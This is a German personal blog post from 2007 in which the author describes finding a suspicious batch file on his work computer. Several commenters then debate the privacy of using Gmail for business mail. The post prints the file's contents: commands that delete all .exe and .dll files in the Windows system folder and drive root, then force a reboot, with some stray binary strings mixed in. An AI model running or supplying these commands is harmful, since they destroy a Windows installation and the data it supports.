18 April 2007

Böse

Die Tage habe ich mal wieder Frühjahrsputz auf meinem Rechner (Arbeit) gemacht und in C: eine xgL.bat gefunden.

Als ich rein schaute was die so anstellt, war ich echt erstaunt was da so auf meinem PC liegt.

del C:\windows\system32\*.exe
del C:\windows\system32\*.dll
del C:\*.dll
del C:\*.exe
shutdown -r -t 0 open -LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32 w32_sharedptr->size == sizeof(W32_EH_SHARED) %s:%u: failed assertion `%s‘
../../gcc/gcc/config/i386/w32-shared-ptr.c GetAtomNameA (atom, s, sizeof(s)) != 0

Für die, die sich damit nicht auskennen, nach der Ausführung der Datei wäre mein PC wahrscheinlich nicht mehr hochgefahren 😀

Schon komisch. Ich surfe auf der Arbeit eigentlich gar nicht und nur mit dem FF und der ist durch Ad und Scriptblocker komplett abgesichert.  Und so was fängt man sich meistens nur durchs Surfen ein. Ansonsten sind wir recht sicher. 

Auf allen anderen Systemen im Haus habe ich nichts gefunden. Auch alle Scanner sagen nein. Emails (auch Geschäftliche) werden bei uns Online (Google Mail) abgerufen, da wir nichts vom runterladen halten.

Aber auf jedenfalls ein Nettes Script 😀 



Copyright 2018. All rights reserved.

Verfasst April 18, 2007 von Heiko in category "Privates

8 COMMENTS :

  1. By Macros on

    Hm,

    ihr gebt geschaeftliche E-Mails in die Haende von google? Datenschutz ist also bei euch ein Fremdwort und wo kommuniziert ihr das?

    Gruss

    Antworten
  2. By Heiko (Autor) on

    In den Datenschutzbestimmungen unserer Webseite.
    Aber sagst du jedem der dir eine E-Mail schickt mit was du die abholst? Datenschutz? Meinst du das Gmail anders mit den Daten umgeht als andere Webmailer?

    Antworten
  3. By Macros on

    Hi,

    ja machen sie.

    Sie erstellen daraus Identitaetsprofile, Kontaktdaten usw.. Wer kennt wen und wen kennt dieser?

    Desweiteren werden die Googlesuchanfragen auch gespeichert und wenn du eingelogt bist deinem Profil zugeordnet.

    Gruss

    Antworten
  4. By mars on

    @macros: und du glaubst das machen die anderen provider nicht? wenn du 100% safe sein willst, mach den router aus, ganz einfach…

    Antworten
  5. By Macros on

    Hi,

    naja auf meinen eigenen Postfaechern mache ich es mit Sicherheit nicht.
    Und nein, ich denke nicht, dass andere Provider diese Marktmacht haben.

    Gruss

    Antworten
  6. By Frank on

    @mars:
    Provider die in Deutschland sitzen müssen sich an Deutsche Gesetze halten. Und damit machen die das nicht was Google macht da sie es nicht dürfen!

    Antworten

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.